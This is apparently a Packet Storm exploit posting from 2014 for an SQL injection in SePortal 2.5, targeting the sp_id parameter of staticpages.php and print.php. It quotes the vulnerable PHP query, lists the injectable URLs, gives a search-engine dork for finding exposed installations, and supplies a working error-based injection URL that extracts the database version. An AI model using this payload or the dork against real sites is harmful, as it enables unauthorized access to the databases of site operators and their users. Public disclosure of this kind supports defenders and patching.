SePortal version 2.5 suffers from a remote SQL injection vulnerability in the sp_id variable of staticpages.php. This version has already had known SQL injection vulnerabilities noted in 2011.
8f4257a80f761be925bfdf6c5c86b1aa0a890871ff237d0be07eb7a35351f1e2####################################################################
Exploit: SePortal 2.5 Sql Injection Vulnerabilty
Author: jsass
Date : 19\03\2014
Contact Twitter: @Kwsecurity
Script: http://www.seportal.org/
version: 2.5
Tested on: Linux Ubuntu 12.4 & Windows 7
Dork : "Powered by SePortal 2.5"
//** Searching And Analysis By Kuwaity Crew **\\
####################################################################
SQL INJECTION Vulnerabilty
code :
$main_template = 'staticpages';
define('GET_CACHES', 1);
define('ROOT_PATH', './');
define('GET_USER_ONLINE', 1);
define('GET_STATS_BOX', 1);
include(ROOT_PATH.'global.php');
require(ROOT_PATH.'includes/sessions.php');
$sql = "SELECT *
FROM ".STATICPAGE_TABLE."
WHERE sp_id = '".$sp_id."'";
$result = $site_db->query($sql);
files:
staticpages.php?sp_id=(inject here)
print.php?mode=staticpage&client=printer&sp_id=(inject here)
example:
http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20-
//////////////////////////////////////////////////////////////////////////////////
Greats: dzkabyle & Mr.Exit & massacreur & rDNix & hamza & Q8 Spy & الشبح الدموي & medo medo & sec4ever.com & is-sec.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed